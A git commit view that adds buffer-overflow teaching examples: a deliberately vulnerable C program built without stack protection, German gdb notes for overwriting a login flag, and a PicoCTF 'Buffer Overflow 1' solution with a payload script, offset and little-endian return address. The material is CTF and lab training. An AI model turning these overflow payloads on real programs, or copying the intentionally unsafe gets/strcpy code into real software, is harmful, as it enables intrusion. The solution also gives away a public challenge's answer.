Examples and stuff
This commit is contained in:
parent
1f6b8db99d
commit
525e0ca1cc
1
assets/logic/.gitignore
vendored
Normal file
1
assets/logic/.gitignore
vendored
Normal file
@ -0,0 +1 @@
|
||||
logic
|
16
assets/logic/Makefile
Normal file
16
assets/logic/Makefile
Normal file
@ -0,0 +1,16 @@
|
||||
# use bash so process substutution is available
|
||||
CC = gcc
|
||||
CFLAGS = -fno-stack-protector -g
|
||||
SHELL = bash
|
||||
SRC = logic.c
|
||||
TARGET = $(SRC:%.c=%)
|
||||
|
||||
.PHONY: build
|
||||
build: $(TARGET)
|
||||
|
||||
%: %.c
|
||||
$(CC) ${CFLAGS} $< -o $@
|
||||
|
||||
.PHONY: clean
|
||||
clean:
|
||||
rm -f logic
|
@ -3,7 +3,7 @@
|
||||
|
||||
void foo(char *input) {
|
||||
int is_logged_in = 0;
|
||||
char buf[50];
|
||||
char buf[64];
|
||||
strcpy(buf, input);
|
||||
if (is_logged_in) {
|
||||
puts("logged in!!1!");
|
||||
@ -13,5 +13,9 @@ void foo(char *input) {
|
||||
}
|
||||
|
||||
int main(int argc, char **argv) {
|
||||
foo(argv[1]);
|
||||
if (argc != 2) {
|
||||
return 1;
|
||||
}
|
||||
foo(argv[1]);
|
||||
return 0;
|
||||
}
|
8
assets/logic/solution.md
Normal file
8
assets/logic/solution.md
Normal file
@ -0,0 +1,8 @@
|
||||
# Beispiel 1
|
||||
|
||||
* Debugger `gdb`
|
||||
* `list` für Code
|
||||
* `break <n>` für Breakpoint
|
||||
* `run $(python -c 'print("A"*77)')`
|
||||
* `show is_logged_in`
|
||||
* `continue`
|
1
assets/picoctf/buffer_overflow_1/.gitignore
vendored
Normal file
1
assets/picoctf/buffer_overflow_1/.gitignore
vendored
Normal file
@ -0,0 +1 @@
|
||||
payload
|
17
assets/picoctf/buffer_overflow_1/payload.sh
Executable file
17
assets/picoctf/buffer_overflow_1/payload.sh
Executable file
@ -0,0 +1,17 @@
|
||||
#!/usr/bin/env bash
|
||||
|
||||
function repeat() {
|
||||
n="${1}"
|
||||
string="${2}"
|
||||
printf "%${n}s" | tr " " "${string}"
|
||||
}
|
||||
|
||||
function main() {
|
||||
buffer_size="${1}"
|
||||
address="${2}"
|
||||
filler="$(repeat "${buffer_size}" A)"
|
||||
newline="\n"
|
||||
printf "%s%b%b" "${filler}" "${address}" "${newline}"
|
||||
}
|
||||
|
||||
main "${@}"
|
10
assets/picoctf/buffer_overflow_1/solution.md
Normal file
10
assets/picoctf/buffer_overflow_1/solution.md
Normal file
@ -0,0 +1,10 @@
|
||||
# PicoCTF - Buffer Overflow 1
|
||||
|
||||
https://play.picoctf.org/practice/challenge/258?category=6&page=1
|
||||
|
||||
* Buffergröße bestimmen
|
||||
* Return Adresse überschreiben
|
||||
* Adresse der Zielfunktion finden `nm -g -C vuln`
|
||||
* Little Endian!
|
||||
* `./payload.sh 44 "\xf6\x91\x04\x08" | nc ...`
|
||||
* `perl -e 'print "A"x44 . "\xf6\x91\x04\x08\n"'`
|
BIN
assets/picoctf/buffer_overflow_1/vuln
Normal file
BIN
assets/picoctf/buffer_overflow_1/vuln
Normal file
Binary file not shown.
42
assets/picoctf/buffer_overflow_1/vuln.c
Normal file
42
assets/picoctf/buffer_overflow_1/vuln.c
Normal file
@ -0,0 +1,42 @@
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <unistd.h>
|
||||
#include <sys/types.h>
|
||||
#include "asm.h"
|
||||
|
||||
#define BUFSIZE 32
|
||||
#define FLAGSIZE 64
|
||||
|
||||
void win() {
|
||||
char buf[FLAGSIZE];
|
||||
FILE *f = fopen("flag.txt","r");
|
||||
if (f == NULL) {
|
||||
printf("%s %s", "Please create 'flag.txt' in this directory with your",
|
||||
"own debugging flag.\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
fgets(buf,FLAGSIZE,f);
|
||||
printf(buf);
|
||||
}
|
||||
|
||||
void vuln(){
|
||||
char buf[BUFSIZE];
|
||||
gets(buf);
|
||||
|
||||
printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
|
||||
}
|
||||
|
||||
int main(int argc, char **argv){
|
||||
|
||||
setvbuf(stdout, NULL, _IONBF, 0);
|
||||
|
||||
gid_t gid = getegid();
|
||||
setresgid(gid, gid, gid);
|
||||
|
||||
puts("Please enter your string: ");
|
||||
vuln();
|
||||
return 0;
|
||||
}
|
||||
|
Loading…
Reference in New Issue
Block a user